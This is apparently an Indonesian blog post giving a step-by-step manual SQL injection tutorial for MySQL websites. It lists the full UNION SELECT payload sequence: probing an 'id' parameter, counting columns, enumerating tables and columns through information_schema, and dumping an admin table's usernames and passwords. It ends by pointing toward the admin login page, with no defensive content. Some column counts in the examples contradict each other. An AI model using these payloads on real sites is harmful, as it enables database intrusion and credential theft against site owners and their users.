sebelumnya apakah anda sudah tw apa itu sql injection??
sql injection adalah sebuah aksi penetration test yang dilakukan di aplikasi client dengan cara memodifikasi perintah sql yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
atau secara dasar mengeksploitasi sebuah database
thap melakukan SQL injection :
Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x
1. carilah target
ex : blablabla/berita.php?id=100
Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk mencek apakah ketika kita menekan enter terjadi eror
ex :
blablabla/berita.php?id=100'
sampai si eror keluar
2. carilah jumlah tabel dengan menggunakan perintah
ex : blablabla/berita.php?id=-100+order+by+1--
ceklah secara step by step (satupersatu)...
ex :
blablabla/berita.php?id=-100+order+by+1--
blablabla/berita.php?id=-100+order+by+2--
blablabla/berita.php?id=-100+order+by+........--
blablabla/berita.php?id=-100+order+by+seterusnya--
sampai si eror nongol
ex : blablabla/berita.php?id=-100+order+by+6--
berarti angka togelnya 5
menjadi blablabla/berita.php?id=-100+order+by+5--
3. untuk mencari angka yg eror buat perintah sperti di bawah ini untuk mengetahui si eror
maka: blablabla/berita.php?id=-100+union+select+1,2,3,4,5--
contoh jika yang keluar angka 4
gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah ini pd angka togel td
ex : blablabla/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8--
lihat versi yg digunakan jika versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..
4. untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir
Code:
blablabla/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--
seumpama table yang muncul adalah "admin"
5. untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir
blablabla/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--
6. perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir
blablabla/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema .columns+where+table_name=0xhexa--
pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :
http://www.v3n0m.net/ascii.htm
ex kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E
blablabla/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema .columns+where+table_name=0x61646D696E--
7. memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara
perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir
ex : blablabla/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--
ex kata yang keluar adalah id,username,password
ex : blablabla/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--
8. tahap terakhir mencari halaman tempan si admin login
========================================================
0 komentar:
Post a Comment